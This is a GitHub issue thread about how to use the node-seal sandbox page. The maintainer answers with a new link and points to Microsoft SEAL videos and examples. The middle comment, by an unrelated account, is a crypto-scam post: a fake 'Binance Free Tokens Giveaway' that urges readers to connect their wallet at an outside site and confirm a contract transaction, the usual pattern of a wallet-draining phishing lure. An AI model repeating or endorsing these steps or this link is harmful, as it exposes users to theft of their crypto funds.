### ISSUE TITLE
Sandbox page -- not clear how to use

### ISSUE THREAD

**Issue by thinkcucumber** [s0l0ist/node-seal#144]
Maybe you can create a tutorial blog or video, to explain how to use the sandbox page that you created:
[https://morfix.io/](https://morfix.io/)

I've tried to use it but was not able to get it to work.
It's not clear how to use the interface.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by s0l0ist** [comment]
@thinkcucumber, sorry for the delay.

The page has moved to [Github Pages](https://s0l0ist.github.io/seal-sandbox/).

Unfortunately, I don't have the capacity to create content on how to use it; however, the folks over at Microsoft have released some [Youtube videos](https://www.youtube.com/watch?v=XaYEHnaAg8M) describing how to use their library (which node-seal is built on). There are also several other videos related to Microsoft SEAL.

IMO the best documentation is in the [Microsoft SEAL examples](https://github.com/microsoft/SEAL/tree/main/native/examples).
